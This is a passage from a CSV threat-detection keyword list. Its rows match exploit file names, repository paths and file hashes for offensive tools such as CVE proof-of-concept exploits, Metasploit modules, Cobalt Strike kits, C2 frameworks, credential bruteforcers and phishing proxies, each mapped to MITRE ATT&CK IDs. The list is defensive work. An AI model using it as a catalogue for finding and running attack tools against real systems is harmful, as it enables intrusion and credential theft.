tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.exe*",".{0,1000}CVE\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.git*",".{0,1000}CVE\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.msi*",".{0,1000}CVE\-.{0,1000}\.msi.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.pl*",".{0,1000}CVE\-.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.ps1*",".{0,1000}CVE\-.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.py*",".{0,1000}CVE\-.{0,1000}\.py.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.reg*",".{0,1000}CVE\-.{0,1000}\.reg.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.run*",".{0,1000}CVE\-.{0,1000}\.run.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.sh*",".{0,1000}CVE\-.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.vb*",".{0,1000}CVE\-.{0,1000}\.vb.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.vbe*",".{0,1000}CVE\-.{0,1000}\.vbe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.vbs*",".{0,1000}CVE\-.{0,1000}\.vbs.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.vbscript*",".{0,1000}CVE\-.{0,1000}\.vbscript.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.zsh*",".{0,1000}CVE\-.{0,1000}\.zsh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE*/exploit.sh*",".{0,1000}CVE.{0,1000}\/exploit\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - 
TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*CVE_*_exploited.txt*",".{0,1000}CVE_.{0,1000}_exploited\.txt.{0,1000}","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","1","45","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z" "*cve_2_MSF_exploit_Mapping*",".{0,1000}cve_2_MSF_exploit_Mapping.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","494","109","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" "*CVE_20*.dll*",".{0,1000}CVE_20.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*cve_2019_0708_bluekeep_fail*",".{0,1000}cve_2019_0708_bluekeep_fail.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cve_2019_0708_bluekeep_pass*",".{0,1000}cve_2019_0708_bluekeep_pass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cve_2020_0796_smbghost.*",".{0,1000}cve_2020_0796_smbghost\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*CVE-2*-RCE.py*",".{0,1000}CVE\-2.{0,1000}\-RCE\.py.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*cve-20.x64.dll*",".{0,1000}cve\-20\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*cve-20.x86.dll*",".{0,1000}cve\-20\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*CVE-2020-5902-Scanner/scanner.py*",".{0,1000}CVE\-2020\-5902\-Scanner\/scanner\.py.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation 
tools","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","1","55","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z" "*CVE-2021-34527.ps1*",".{0,1000}CVE\-2021\-34527\.ps1.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cve-20220-26809_exploit.py*",".{0,1000}cve\-20220\-26809_exploit\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*CVE-2022-21882.x64.dll*",".{0,1000}CVE\-2022\-21882\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cve-2022-23131.py *",".{0,1000}cve\-2022\-23131\.py\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/L0ading-x/cve-2022-23131","1","0","N/A","N/A","1","25","12","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z" "*cve-2022-26809-scanVuln.py*",".{0,1000}cve\-2022\-26809\-scanVuln\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*CVE-2022-30190-follina-Office-MSDT-Fixed*",".{0,1000}CVE\-2022\-30190\-follina\-Office\-MSDT\-Fixed.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","392","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" "*CVE-2023-20887.git*",".{0,1000}CVE\-2023\-20887\.git.{0,1000}","offensive_tool_keyword","POC","VMWare vRealize Network Insight 
Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","3","226","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" "*cve-2023-21554.nse*",".{0,1000}cve\-2023\-21554\.nse.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*CVE-2023-23397.ps1*",".{0,1000}CVE\-2023\-23397\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","338","62","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "*CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ*",".{0,1000}CVE\-2023\-46604\-RCE\-Reverse\-Shell\-Apache\-ActiveMQ.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","9","1","91","31","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z" "*CVE-2024-1086/exploit*",".{0,1000}CVE\-2024\-1086\/exploit.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" 
"*CVE-2024-1086-1.0.0.zip*",".{0,1000}CVE\-2024\-1086\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*cvescanner.py*",".{0,1000}cvescanner\.py.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","6","512","113","2024-04-17T22:22:22Z","2021-08-18T08:58:14Z" "*cwB0AGEAcgB0ACAAYwBhAGwAYwA=*",".{0,1000}cwB0AGEAcgB0ACAAYwBhAGwAYwA\=.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*cyberark/ACLight*",".{0,1000}cyberark\/ACLight.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*cyberark/kubesploit*",".{0,1000}cyberark\/kubesploit.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - 
TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*cyberark/PipeViewer*",".{0,1000}cyberark\/PipeViewer.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*cybersectroll/SharpPersistSD*",".{0,1000}cybersectroll\/SharpPersistSD.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*cyclone.hashesorg.hashkiller.combined*",".{0,1000}cyclone\.hashesorg\.hashkiller\.combined.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*cyllective/nimproxydll*",".{0,1000}cyllective\/nimproxydll.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*cypheroth -u neo4j -p *",".{0,1000}cypheroth\s\-u\sneo4j\s\-p\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - 
TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*-d * bruteforce -*",".{0,1000}\-d\s.{0,1000}\sbruteforce\s\-.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*-d kali-linux *",".{0,1000}\-d\skali\-linux\s.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*D Y N A S T Y - P E R S I S T*",".{0,1000}D\sY\sN\sA\sS\sT\sY\s\s\-\sP\sE\sR\sS\sI\sS\sT.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*D00MFist/Mystikal*",".{0,1000}D00MFist\/Mystikal.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" 
"*D00Movenok/HTMLSmuggler*",".{0,1000}D00Movenok\/HTMLSmuggler.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","2","135","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z" "*d02161cdc91cdee273f8b6e47f98a322756847ae3b5f4efe6d439fa5e13f9039*",".{0,1000}d02161cdc91cdee273f8b6e47f98a322756847ae3b5f4efe6d439fa5e13f9039.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*d029b40b87bd1462c77138f017ab6914a3753c4ec47bcbf192231a6b2585cf36*",".{0,1000}d029b40b87bd1462c77138f017ab6914a3753c4ec47bcbf192231a6b2585cf36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d0659e8489bc633b617e86f4e7994a593ada5cfc8463f79631d9672623b79750*",".{0,1000}d0659e8489bc633b617e86f4e7994a593ada5cfc8463f79631d9672623b79750.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*d0684a4f8a1dde0fefa5272d38fd96c21388f0398beff1a2847ff0c021611068*",".{0,1000}d0684a4f8a1dde0fefa5272d38fd96c21388f0398beff1a2847ff0c021611068.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even 